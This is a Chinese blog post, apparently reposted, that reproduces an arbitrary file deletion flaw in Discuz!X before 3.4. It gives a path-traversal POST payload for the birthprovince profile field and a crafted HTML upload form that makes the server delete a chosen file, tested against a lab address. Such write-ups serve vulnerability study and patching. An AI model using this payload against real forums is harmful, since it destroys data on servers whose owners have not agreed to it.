Discuz!X前台任意文件删除漏洞重现

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Discuz!X前台任意文件删除漏洞重现相关的知识,希望对你有一定的参考价值。

漏洞影响了Discuz 3.4 以下的所有版本。
该漏洞存在于upload/source/include/spacecp/spacecp_profile.php,文件中的submitcheck()函数。成功上传文件会跳转执行unlink这个函数。


1.进入设置-个人资料,先在页面源代码找到formhash值,可以看到值为2599b5e5

技术图片

2.开启一个插件Hackbar
Post数据:birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5

技术图片

执行后会显示一片空白,你再刷新下或重新访问下就好了。
技术图片
技术图片

3.出生地被修改成要删除的文件。
最后构造表单执行删除文件

<form
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="720c16c3"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>

技术图片

生成.html,上面的需要自己修改。
4.然后随便上传一张图片,就能删除自己要删除的。

技术图片

5.再访问回去看一下。

技术图片

以上是关于Discuz!X前台任意文件删除漏洞重现的主要内容,如果未能解决你的问题,请参考以下文章

Discuz!X 3.4 前台任意文件删除漏洞复现

Discuz!X 3.4 任意文件删除漏洞复现过程(附python脚本)

Discuz≤3.4任意文件删除漏洞

网站漏洞修复案例之Discuz!3.4最新版本

[代码审计]phpshe开源商城后台两处任意文件删除至getshell

DiscuzML 3.x任意代码执行漏洞CNVD-2019-22239